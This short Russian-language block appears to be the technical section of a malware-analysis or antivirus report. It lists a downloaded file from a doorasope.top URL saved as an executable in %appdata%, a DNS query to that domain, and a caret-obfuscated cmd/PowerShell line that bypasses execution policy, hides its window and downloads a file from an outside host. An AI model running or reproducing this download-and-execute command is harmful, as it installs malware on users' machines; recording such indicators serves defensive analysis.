Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POwEr^Sh^ELl.E^X^E -E^XE^CUTiOnp^OLic^y By^pAsS ^-NO^pROf^i^l^e ^-W^INd^o^WsT^YLe h^i^d^dEn ^(^n^e^W-oBJ^ECt^ Syste^m.^Ne^t.^we^bc^L^IEn^t)^.^do^w^n^l^o^adfI^LE('http://ww...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /c "POwEr^Sh^ELl.E^X^E -E^XE^CUTiOnp^OLic^y By^pAsS ^-NO^pROf^i^l^e ^-W^INd^o^WsT^YLe h^i^d^dEn ^(^n^e^W-oBJ^ECt^ Syste^m.^Ne^t.^we^bc^L^IEn^t)^.^do^w^n^l^o^adfI^LE('http://ww...' (со скрытым окном)